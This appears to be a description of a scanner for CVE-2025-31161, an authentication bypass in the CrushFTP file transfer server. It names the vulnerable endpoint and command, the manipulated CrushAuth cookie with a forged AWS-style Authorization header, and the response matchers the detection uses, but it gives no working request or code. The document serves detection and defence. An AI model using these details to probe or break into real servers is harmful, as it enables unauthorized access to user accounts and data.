CVE-2025-31161 Scanner

CrushFTP is a robust and powerful file transfer server used by organizations to manage and automate data exchange securely over multiple protocols. Commonly deployed in enterprise environments, it supports features like user access control, data encryption, and extensive logging. CrushFTP is often chosen for its flexibility in supporting FTP, SFTP, HTTP, HTTPS, and WebDAV. It is widely used across industries including government, financial services, and IT infrastructure. The platform is managed via a web interface, offering both administrative and user-level access. Its authentication mechanisms are critical to maintaining secure boundaries within hosted environments.

The vulnerability identified in CrushFTP allows unauthenticated users to bypass authentication checks and gain unauthorized access. Specifically, attackers can forge a crafted HTTP request containing manipulated authorization headers and cookies. This bypass allows them to retrieve sensitive user lists and potentially escalate access to administrative functions. The root cause lies in insufficient validation and improper handling of session authentication tokens. As a result, the application mistakenly treats the request as authenticated. This flaw poses a critical risk to confidentiality, integrity, and availability.

Technical analysis reveals that the flaw is exploited via the `/WebInterface/function/` endpoint, particularly when processing the `getUserList` command. Attackers manipulate the `CrushAuth` cookie and use a forged AWS-style `Authorization` header. If successful, the server returns a valid XML response listing user accounts including privileged accounts like `crushadmin`. The request payload format combined with specific tokens and header injection triggers the bypass. The vulnerability does not require prior authentication and works remotely. Matchers verify the presence of `crushadmin` in the response along with a 200 OK status and `text/xml` content type.

Exploitation of this vulnerability allows attackers to view and potentially modify user lists, including administrative users. If extended, this can lead to complete system compromise, data leakage, unauthorized configuration changes, or even Remote Code Execution depending on further chained flaws. Attackers could use the access to create new users or alter server settings. Organizations relying on CrushFTP may experience a total security breach if the issue is not promptly mitigated. The impact affects confidentiality, integrity, and availability at a critical level.

REFERENCES

• https://projectdiscovery.io/blog/crushftp-authentication-bypass/
• https://www.rapid7.com/blog/post/2025/03/25/etr-notable-vulnerabilities-in-next-js-cve-2025-29927/
• https://www.crushftp.com/crush11wiki/Wiki.jsp?page=Update
• https://nvd.nist.gov/vuln/detail/CVE-2025-31161